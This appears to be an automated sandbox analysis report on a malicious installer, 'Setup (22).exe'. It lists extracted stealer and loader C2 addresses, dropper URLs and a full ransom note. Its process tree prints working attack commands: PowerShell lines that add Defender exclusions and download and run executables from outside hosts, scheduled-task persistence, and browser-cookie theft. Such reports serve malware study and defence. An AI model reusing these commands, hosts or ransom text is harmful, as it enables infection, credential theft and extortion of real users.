Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    590s
  • max time network
    1782s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 10:21

General

  • Target

    Setup (22).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bc6269f31h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bcfeb5393h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120c8f91373ch?raw

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-I6qIbIYiz9 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: managerhelper@airmail.cc Your personal ID: 0326gDrgoC4j04vLx6lqyFlyzpTC55w9igCGDgaBYLhUjv3Rr
Emails

manager@mailtemp.ch

managerhelper@airmail.cc

URLs

https://we.tl/t-I6qIbIYiz9

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

@Gerhdhd

C2

46.8.19.177:41228

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 11 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 25 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 12 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 18 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 29 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 16 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 29 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 31 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 10 IoCs
  • Suspicious behavior: SetClipboardViewer 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 61 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS
    1⤵
      PID:1404
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
      • Suspicious use of SetThreadContext
      PID:2704
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        PID:5020
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2812
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2796
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2532
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2512
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1952
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1348
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1188
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1064
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:492
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                        2⤵
                        • Suspicious use of SetThreadContext
                        • Suspicious use of SendNotifyMessage
                        PID:8608
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          3⤵
                            PID:5984
                            • C:\Windows\SysWOW64\schtasks.exe
                              /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                              4⤵
                              • Creates scheduled task(s)
                              PID:7044
                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                          C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                          2⤵
                            PID:9188
                          • C:\Users\Admin\AppData\Local\7747ff0d-3ccd-404a-adda-1eed913d306e\FDBB.exe
                            C:\Users\Admin\AppData\Local\7747ff0d-3ccd-404a-adda-1eed913d306e\FDBB.exe --Task
                            2⤵
                            • Drops file in Windows directory
                            • Checks SCSI registry key(s)
                            PID:3224
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:68
                          • C:\Users\Admin\AppData\Local\Temp\Setup (22).exe
                            "C:\Users\Admin\AppData\Local\Temp\Setup (22).exe"
                            1⤵
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:4800
                            • C:\Users\Admin\Documents\eiGd2JDUU0dN9M83B3cf5hCN.exe
                              "C:\Users\Admin\Documents\eiGd2JDUU0dN9M83B3cf5hCN.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:2368
                            • C:\Users\Admin\Documents\VwQqyIEtIQiqOFuVWw7gWHZj.exe
                              "C:\Users\Admin\Documents\VwQqyIEtIQiqOFuVWw7gWHZj.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2220
                            • C:\Users\Admin\Documents\7HS9H3G8r_cKvEziTmf7FTb_.exe
                              "C:\Users\Admin\Documents\7HS9H3G8r_cKvEziTmf7FTb_.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2168
                            • C:\Users\Admin\Documents\1vooYukf6WU6k9MpHAnkwqrX.exe
                              "C:\Users\Admin\Documents\1vooYukf6WU6k9MpHAnkwqrX.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1568
                            • C:\Users\Admin\Documents\_t8eNnwX6KYKfXkwloHxOTPI.exe
                              "C:\Users\Admin\Documents\_t8eNnwX6KYKfXkwloHxOTPI.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:1100
                              • C:\Users\Admin\Documents\_t8eNnwX6KYKfXkwloHxOTPI.exe
                                C:\Users\Admin\Documents\_t8eNnwX6KYKfXkwloHxOTPI.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1236
                            • C:\Users\Admin\Documents\d8r7FHyHJCrDCGERrQWIRqLO.exe
                              "C:\Users\Admin\Documents\d8r7FHyHJCrDCGERrQWIRqLO.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1824
                              • C:\Users\Admin\AppData\Roaming\6822252.exe
                                "C:\Users\Admin\AppData\Roaming\6822252.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4876
                              • C:\Users\Admin\AppData\Roaming\4624290.exe
                                "C:\Users\Admin\AppData\Roaming\4624290.exe"
                                3⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                PID:4908
                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  PID:4276
                              • C:\Users\Admin\AppData\Roaming\7468314.exe
                                "C:\Users\Admin\AppData\Roaming\7468314.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4652
                            • C:\Users\Admin\Documents\FosKB2Mcs9Etrf3_yllW3zpq.exe
                              "C:\Users\Admin\Documents\FosKB2Mcs9Etrf3_yllW3zpq.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:1804
                              • C:\Users\Admin\Documents\FosKB2Mcs9Etrf3_yllW3zpq.exe
                                C:\Users\Admin\Documents\FosKB2Mcs9Etrf3_yllW3zpq.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1088
                            • C:\Users\Admin\Documents\31PX_ym4OSr3ASnyn_2pd3hh.exe
                              "C:\Users\Admin\Documents\31PX_ym4OSr3ASnyn_2pd3hh.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1796
                            • C:\Users\Admin\Documents\9X63dy2DS4dWHeF8pFyQKTuf.exe
                              "C:\Users\Admin\Documents\9X63dy2DS4dWHeF8pFyQKTuf.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:2500
                              • C:\Users\Admin\Documents\9X63dy2DS4dWHeF8pFyQKTuf.exe
                                C:\Users\Admin\Documents\9X63dy2DS4dWHeF8pFyQKTuf.exe
                                3⤵
                                • Executes dropped EXE
                                PID:2372
                              • C:\Users\Admin\Documents\9X63dy2DS4dWHeF8pFyQKTuf.exe
                                C:\Users\Admin\Documents\9X63dy2DS4dWHeF8pFyQKTuf.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3112
                            • C:\Users\Admin\Documents\eQZ3Lk9N1DfBVb17awS4tAvF.exe
                              "C:\Users\Admin\Documents\eQZ3Lk9N1DfBVb17awS4tAvF.exe"
                              2⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:2520
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 760
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:6100
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 788
                                3⤵
                                • Program crash
                                PID:5376
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 792
                                3⤵
                                • Program crash
                                PID:5592
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 828
                                3⤵
                                • Program crash
                                PID:5792
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 956
                                3⤵
                                • Program crash
                                PID:5932
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 984
                                3⤵
                                • Program crash
                                PID:6132
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 1000
                                3⤵
                                • Program crash
                                PID:5264
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 1388
                                3⤵
                                • Program crash
                                PID:6104
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 1504
                                3⤵
                                • Program crash
                                PID:5740
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 1588
                                3⤵
                                • Program crash
                                PID:496
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 1608
                                3⤵
                                • Program crash
                                PID:6840
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 1736
                                3⤵
                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                • Program crash
                                PID:6368
                            • C:\Users\Admin\Documents\xzwin0Fq7tS5zKWYkHV0djCV.exe
                              "C:\Users\Admin\Documents\xzwin0Fq7tS5zKWYkHV0djCV.exe"
                              2⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              PID:4060
                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:800
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                  • Executes dropped EXE
                                  PID:2504
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                    PID:1412
                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Checks whether UAC is enabled
                                  • Drops file in Program Files directory
                                  PID:2768
                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:1504
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5256
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                      PID:5976
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:300
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:5440
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -u -p 1504 -s 1416
                                      4⤵
                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                      • Program crash
                                      PID:6124
                                • C:\Users\Admin\Documents\1fbz9vi6vgAk8S1D8uvUEkxO.exe
                                  "C:\Users\Admin\Documents\1fbz9vi6vgAk8S1D8uvUEkxO.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:4004
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                    3⤵
                                      PID:1032
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                        4⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2840
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                        4⤵
                                          PID:7116
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                          4⤵
                                          • Executes dropped EXE
                                          PID:5976
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                          4⤵
                                            PID:10196
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                            4⤵
                                            • Blocklisted process makes network request
                                            PID:9292
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                            4⤵
                                            • Blocklisted process makes network request
                                            PID:10004
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                            4⤵
                                            • Blocklisted process makes network request
                                            PID:9516
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                            4⤵
                                              PID:9792
                                              • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                5⤵
                                                  PID:6600
                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                    6⤵
                                                      PID:10048
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                        7⤵
                                                          PID:1500
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                          7⤵
                                                            PID:8696
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                            7⤵
                                                              PID:7920
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                              7⤵
                                                                PID:3656
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                              6⤵
                                                                PID:8640
                                                                • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                  7⤵
                                                                  • Drops file in System32 directory
                                                                  PID:7388
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                    8⤵
                                                                      PID:10156
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                        9⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:8720
                                                                    • C:\Windows\system32\services32.exe
                                                                      "C:\Windows\system32\services32.exe"
                                                                      8⤵
                                                                        PID:4236
                                                                        • C:\Windows\system32\cmd.exe
                                                                          "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                          9⤵
                                                                            PID:6860
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                              10⤵
                                                                                PID:8876
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                10⤵
                                                                                  PID:2568
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                  10⤵
                                                                                    PID:7292
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                    10⤵
                                                                                      PID:6832
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                    9⤵
                                                                                      PID:9776
                                                                                      • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                        10⤵
                                                                                        • Drops file in System32 directory
                                                                                        PID:7944
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                          11⤵
                                                                                            PID:7308
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              12⤵
                                                                                                PID:4476
                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                12⤵
                                                                                                • Creates scheduled task(s)
                                                                                                PID:1904
                                                                                            • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                                                                                              "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                                                                                              11⤵
                                                                                                PID:5552
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                11⤵
                                                                                                  PID:9112
                                                                                                  • C:\Windows\system32\choice.exe
                                                                                                    choice /C Y /N /D Y /T 3
                                                                                                    12⤵
                                                                                                      PID:9380
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                              8⤵
                                                                                                PID:6940
                                                                                                • C:\Windows\system32\choice.exe
                                                                                                  choice /C Y /N /D Y /T 3
                                                                                                  9⤵
                                                                                                    PID:10072
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                                          4⤵
                                                                                            PID:3384
                                                                                            • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
